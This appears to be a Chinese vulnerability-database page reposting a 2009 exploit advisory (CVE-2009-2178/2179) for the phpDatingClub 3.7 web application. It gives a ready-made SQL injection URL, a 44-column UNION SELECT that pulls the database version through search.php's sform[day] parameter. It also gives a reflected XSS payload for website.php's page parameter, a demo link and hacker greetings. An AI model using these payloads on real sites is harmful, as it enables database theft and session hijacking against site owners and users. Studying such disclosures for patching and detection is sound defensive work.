phpDatingClub 3.7 Remote SQL/XSS Injection Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051840 漏洞类型
发布时间 2009-06-26 更新时间 2009-06-26
CVE编号 CVE-2009-2178
CVE-2009-2179
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009060179
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
phpDatingClub v 3.7(ansubdepartments_id) SQL/XSS Injection Vulnerability    
Note: Algeria 2-0 Zambia

Founder : ThE g0bL!N
Home:WwW.Snakespc.CoM
More info:http://www.w2b.ru/webapp.php?cat=phpDatingClub

SQL Injection Vulnerability  

Exploit

Http://www.site.com/phpDatingClub/search.php?mode=day&sform%5Bday%5D=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
Xss
website.php?page=%3Cscript%3Ealert(0)%3C/script%3E
Demo
----
http://www.w2b.ru/demo/phpDatingClub/

Greeting : Super_Ctistal (My Master)  And all Muslims&algerian Hackers